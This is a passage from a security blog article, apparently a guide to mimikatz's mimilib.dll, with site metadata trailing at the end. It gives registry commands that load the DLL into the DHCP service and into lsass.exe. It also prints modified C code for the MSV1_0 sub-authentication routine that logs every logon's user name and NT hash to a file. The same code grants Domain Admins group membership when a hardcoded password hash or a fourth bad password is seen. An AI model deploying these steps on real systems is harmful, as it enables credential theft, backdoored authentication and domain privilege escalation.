code to set the MAC addresses that need to be disabled. The corresponding code location is: https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fkdhcp.c#L35\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify the registry location: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters\u003C\u002Fp>\u003Cp>Create a new registry entry CalloutDlls of type REG_MULTI_SZ with the value mimilib.dll\u003C\u002Fp>\u003Cp>Create a new registry entry CalloutEnabled of type DWORD with the value 1\u003C\u002Fp>\u003Cp>The corresponding cmd commands are as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters \u002Fv CalloutDlls \u002Ft REG_MULTI_SZ \u002Fd \"mimilib.dll\" \u002Ff\u003Cbr>reg add HKLM\\System\\CurrentControlSet\\Services\\DHCPServer\\Parameters \u002Fv CalloutEnabled \u002Ft REG_DWORD \u002Fd 1 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The process svchost.exe will load mimilib.dll and discard DHCP requests corresponding to the MAC address\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fprevious-versions\u002Fwindows\u002Fdesktop\u002Fdhcp\u002Fhow-the-dhcp-server-api-operates\u003C\u002Fp>\u003Ch3>6.SubAuth\u003C\u002Fh3>\u003Cp>The corresponding export functions are as follows:\u003C\u002Fp>\u003Cul>\u003Cli>Msv1_0SubAuthenticationRoutine\u003C\u002Fli>\u003Cli>Msv1_0SubAuthenticationFilter\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Usage method:\u003C\u002Fp>\u003Cp>Save mimilib.dll to %SystemRoot%\\System32\u003C\u002Fp>\u003Cp>Modify registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\u003C\u002Fp>\u003Cp>Create a new registry entry Auth0 of type REG_SZ with value mimilib\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0 \u002Fv Auth0 \u002Ft REG_SZ \u002Fd \"mimilib\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If in a domain environment, configuration is required on the domain controller\u003C\u002Fp>\u003Cp>Modify registry location: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos\u003C\u002Fp>\u003Cp>Create a new registry entry Auth0 of type REG_SZ with value mimilib\u003C\u002Fp>\u003Cp>The corresponding cmd command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Kerberos \u002Fv Auth0 \u002Ft REG_SZ \u002Fd \"mimilib\" \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Restart the system\u003C\u002Fp>\u003Cp>The lsass.exe process will load mimilib.dll, generating a file kiwisub.log in %SystemRoot%\\System32 when system login events occur, recording the following information:\u003C\u002Fp>\u003Cul>\u003Cli>UserId\u003C\u002Fli>\u003Cli>PrimaryGroupId\u003C\u002Fli>\u003Cli>LogonDomainName\u003C\u002Fli>\u003Cli>UserName\u003C\u002Fli>\u003Cli>Workstation\u003C\u002Fli>\u003Cli>BadPasswordCount\u003C\u002Fli>\u003Cli>hash\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Note that when the system boots up, it records the login content of the computer account\u003C\u002Fp>\u003Cp>Here, you can try adding code to display the time, which will allow you to obtain the boot time and user login time for each host\u003C\u002Fp>\u003Cp>Corresponding code address: https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimilib\u002Fksub.c\u003C\u002Fp>\u003Cp>The modified content is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u002F*\tBenjamin DELPY `gentilkiwi`\u003Cbr>\thttp:\u002F\u002Fblog.gentilkiwi.com\u003Cbr>\tbenjamin@gentilkiwi.com\u003Cbr>\u003Cbr>\tVincent LE TOUX\u003Cbr>\thttp:\u002F\u002Fpingcastle.com \u002F http:\u002F\u002Fmysmartlogon.com\u003Cbr>\tvincent.letoux@gmail.com\u003Cbr>\u003Cbr>\tLicence : https:\u002F\u002Fcreativecommons.org\u002Flicenses\u002Fby\u002F4.0\u002F\u003Cbr>*\u002F\u003Cbr>#include \"ksub.h\"\u003Cbr>\u003Cbr>\u003Cbr>const BYTE myHash[LM_NTLM_HASH_LENGTH] = {0xea, 0x37, 0x0c, 0xb7, 0xb9, 0x44, 0x70, 0x2c, 0x09, 0x68, 0x30, 0xdf, 0xc3, 0x53, 0xe7, 0x02}; \u002F\u002F Waza1234\u002Fadmin\u003Cbr>NTSTATUS NTAPI ksub_Msv1_0SubAuthenticationRoutine(IN NETLOGON_LOGON_INFO_CLASS LogonLevel, IN PVOID LogonInformation, IN ULONG Flags, IN PUSER_ALL_INFORMATION UserAll, OUT PULONG WhichFields, OUT PULONG UserFlags, OUT PBOOLEAN Authoritative, OUT PLARGE_INTEGER LogoffTime, OUT PLARGE_INTEGER KickoffTime)\u003Cbr>{\u003Cbr>\tFILE *ksub_logfile;;\u003Cbr>#pragma warning(push)\u003Cbr>#pragma warning(disable:4996)\u003Cbr>\tif(ksub_logfile = _wfopen(L\"kiwisub.log\", L\"a\"))\u003Cbr>#pragma warning(pop)\u003Cbr>\t{\u003Cbr>\t\tSYSTEMTIME st;\u003Cbr>\t\tGetLocalTime(&amp;st);\u003Cbr>\u003Cbr>\t\tklog(ksub_logfile, L\"%04d-%02d-%02d %02d:%02d:%02d %u (%u) - %wZ\\\\%wZ (%wZ) (%hu) \", st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond, UserAll-&gt;UserId, UserAll-&gt;PrimaryGroupId, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;LogonDomainName, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;UserName, &amp;((PNETLOGON_LOGON_IDENTITY_INFO) LogonInformation)-&gt;Workstation, UserAll-&gt;BadPasswordCount);\u003Cbr>\t\tif(UserAll-&gt;NtPasswordPresent)\u003Cbr>\t\t\tklog_hash(ksub_logfile, &amp;UserAll-&gt;NtPassword, FALSE);\u003Cbr>\t\tif((UserAll-&gt;BadPasswordCount == 4) || (UserAll-&gt;NtPasswordPresent &amp;&amp; RtlEqualMemory(UserAll-&gt;NtPassword.Buffer, myHash, min(sizeof(myHash), UserAll-&gt;NtPassword.Length))))\u003Cbr>\t\t{\u003Cbr>\t\t\tUserAll-&gt;PrimaryGroupId = 512;\u003Cbr>\t\t\tklog(ksub_logfile, L\" :)\\n\");\u003Cbr>\t\t}\u003Cbr>\t\telse klog(ksub_logfile, L\"\\n\");\u003Cbr>\t\tfclose(ksub_logfile);\u003Cbr>\t}\u003Cbr>\t*WhichFields = 0;\u003Cbr>\t*UserFlags = 0;\u003Cbr>\t*Authoritative = TRUE;\u003Cbr>\tLogoffTime-&gt;QuadPart = KickoffTime-&gt;QuadPart = 0x7fffffffffffffff;\u003Cbr>\treturn STATUS_SUCCESS;\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The test results are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018787921_4_2a45fee1f0-1.jpeg\">\u003C\u002Fp>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fmicrosoft\u002FWindows-classic-samples\u002Ftree\u002Fmaster\u002FSamples\u002FWin7Samples\u002Fsecurity\u002Fauthentication\u002Fmsvsubauth\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fwindows\u002Fwin32\u002Fsecauthn\u002Fmsv1-0-authentication-package\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the specific usage of six functions in Mimilib.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1497,"Onedaysec",5,"published","2026-02-02T08:06:59.473Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Mimilib DLL Usage Guide: 6 Key Functions Explained","Mimilib, Mimikatz, DLL functions, security support provider, password change notify, WinDbg extension, DnsPlugin, exported functions, usage analysis",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],256,255,253,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.582Z","2026-07-23T16:01:16.394Z","draft","2026-07-23T16:04:51.455Z"]